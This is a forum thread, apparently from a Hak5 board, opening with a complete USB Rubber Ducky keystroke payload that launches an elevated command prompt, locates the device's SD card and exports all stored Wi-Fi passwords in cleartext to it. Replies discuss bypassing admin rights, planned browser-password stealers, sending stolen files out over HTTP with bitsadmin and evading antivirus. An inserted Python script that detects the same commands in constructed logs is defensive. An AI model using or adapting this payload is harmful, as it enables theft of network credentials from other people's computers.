
crashie

[Payload] Wi-Fi password stealer saving to SD.


This stealer script exports all the Wi-Fi passwords to the SD mounted in the rubber ducky.
Requirement: This one is to be used with Twin Duck firmware.

DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
DELAY 500
ENTER
DELAY 300
STRING netsh wlan export profile folder=%myd%\ key=clear 
ENTER
DELAY 500
STRING exit
ENTER

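As an added example (not part of the thread or of the payload above), this Python script runs a simple detection over constructed process-creation log lines: it flags the `netsh wlan export profile ... key=clear` command the payload relies on and raises the severity when the same user enumerated volume labels with `wmic` shortly before, which is how the payload locates its own storage. The four-field log layout is an assumption of this example, not a real Sysmon or Event ID 4688 schema.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (not real logs), in an assumed
# "timestamp|user|parent_image|command_line" layout. Events 3-5 reproduce what
# the payload in the first post leaves behind; the others are benign noise.
SAMPLE_EVENTS = """\
2023-01-01T10:00:00|alice|explorer.exe|notepad.exe notes.txt
2023-01-01T10:00:03|alice|cmd.exe|netsh wlan show interfaces
2023-01-01T10:00:07|alice|cmd.exe|wmic volume get driveletter, label
2023-01-01T10:00:07|alice|cmd.exe|findstr "DUCKY"
2023-01-01T10:00:08|alice|cmd.exe|netsh wlan export profile folder=E:\\ key=clear
2023-01-01T11:30:00|bob|cmd.exe|netsh wlan export profile folder=C:\\backup
"""

# key=clear is what makes the exported profile XML contain the PSK in plaintext.
NETSH_EXPORT_CLEAR = re.compile(r"\bnetsh\b.*\bwlan\b.*\bexport\b.*\bkey=clear\b", re.I)
# Volume-label enumeration is low-signal on its own, so it only adds context.
VOLUME_LABEL_ENUM = re.compile(r"\bwmic\b.*\bvolume\b.*\blabel\b", re.I)

def parse(log_text):
    """Yield (timestamp, user, parent, command_line) from the constructed format."""
    for line in log_text.splitlines():
        ts, user, parent, cmd = line.split("|", 3)
        yield datetime.fromisoformat(ts), user, parent, cmd

def detect(log_text, window=timedelta(seconds=60)):
    """Return one alert per key=clear export; severity is 'high' when the same
    user ran a volume-label enumeration within `window` before the export."""
    events = list(parse(log_text))
    alerts = []
    for ts, user, parent, cmd in events:
        if not NETSH_EXPORT_CLEAR.search(cmd):
            continue
        staged = any(
            u == user and VOLUME_LABEL_ENUM.search(c) and ts - window <= t <= ts
            for t, u, _p, c in events
        )
        alerts.append({
            "time": ts.isoformat(), "user": user, "parent": parent, "command": cmd,
            "severity": "high" if staged else "medium",
            "reason": "WLAN profile export with key=clear"
                      + (" preceded by volume-label enumeration" if staged else ""),
        })
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['time']} {a['user']}: {a['command']} ({a['reason']})")
```

The export without `key=clear` (the last sample event) is deliberately not alerted on, since a profile export that omits the key is a normal administrative task.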

Great work with these new payloads man! keep it up! :rolleyes:


Thanks! I've been playing around all weekend and am getting the hang of things now :P

I am currently working on a browser stealer which is a command-line only one. A small executable that does not need any admin rights, of course; it will be executed from the SD and export a .txt to the SD. There are many browser stealers out there, but some get flagged by the AVs, like NirSoft's, and others are too heavy in size because of a GUI..

And btw, take a look at the bitsadmin payload.. sending files over HTTP :P

Will continue to put up all my work here, was first thinking of putting them on my website but hey.. it's all for the community :P

/crashie


Really excited to see this. Does it require admin rights?

Yeah, sadly enough it does.. the CMD has to run as admin, so the local user has to be in that group, yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges.

To steal the browser passwords (Opera, Safari, Firefox, Chrome) though it's not needed :P I will add that payload later this week when it's finished and tested completely. One version that saves it to the SD and one that sends it out over HTTP. Bitsadmin works great for sending stuff over the Internet as HTTP, but it requires an IIS server on the other end.

I am though working on an exploit to also be able to steal the Wi-Fi passwords in clear-text without being admin as I said.. but it will take some time to finish since I'm working on it alone.

But I'll keep posting the results here :)

/crashie


> Yeah, sadly enough it does.. the CMD has to run as admin, so the local user has to be in that group, yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges.
>
> /crashie

Well.. I wrote a script using these basic techniques and it exported just fine since my user was an admin. I think the vast majority of people on Windows are single users running with admin, so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my SD card. I will try this script and see if it does the magic.


> Well.. I wrote a script using these basic techniques and it exported just fine since my user was an admin. I think the vast majority of people on Windows are single users running with admin, so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my SD card. I will try this script and see if it does the magic.

Yeah, you're right :P Most of the users run as local admin. The wmic should work great.. works fine here at least :) Also keep in mind your keyboard layout so it has the right symbols.. this one won't work with Danish, Norwegian or Swedish layouts because of a missing ^ in the properties file..


I'm not able to get this command to export my profile. I've tried this on two different computers but I get a response like "The filename, directory name, or volume label syntax is incorrect." for a command like "netsh wlan export profile key=clear". Anyone else having issues with this? I am logged in as an admin, and I've also tried to run cmd as administrator.


I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to, right? Let Windows do the work.

http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html

I plan on checking this out sometime when I get home tomorrow. But if the article is correct (Tim Tomes linked to it, and he's freakin' awesome), those keys aren't protected, they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista, when they changed the way Windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong.


> I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to, right? Let Windows do the work.
>
> http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html
>
> I plan on checking this out sometime when I get home tomorrow. But if the article is correct (Tim Tomes linked to it, and he's freakin' awesome), those keys aren't protected, they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista, when they changed the way Windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong.

Hey, I have added your idea to my power-ducky toolkit. It should work, but I don't have a Windows laptop with wireless to test. https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/


You can't recover Wi-Fi keys without admin access. I've already attempted it, as well as taking a look at some of Microsoft's tutorials on how the encryption algorithm works. It's impossible to recover the keys without the correct permissions. The payload "ULTIMATE DATA THEIF!" does way more than just stealing Wi-Fi passwords.
